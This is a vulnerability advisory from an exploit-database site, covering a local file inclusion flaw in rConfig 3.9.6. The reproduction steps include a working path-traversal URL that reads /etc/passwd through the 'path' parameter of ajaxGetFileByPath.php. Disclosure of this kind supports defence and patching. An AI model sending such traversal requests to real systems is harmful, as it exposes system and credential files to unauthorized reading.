rConfig 3.9.6 Local File Inclusion

2021.03.16
Credit: 5a65726f
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) # Date: 2021-03-12 # Exploit Author: 5a65726f # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip # Version: rConfig v3.9.6 # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Tested on: centOS 7 # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # Description: rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server. The following steps can be carried out in duplicating this vulnerability. - Login the rConfig application with your credentials. - Enter the following link to your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top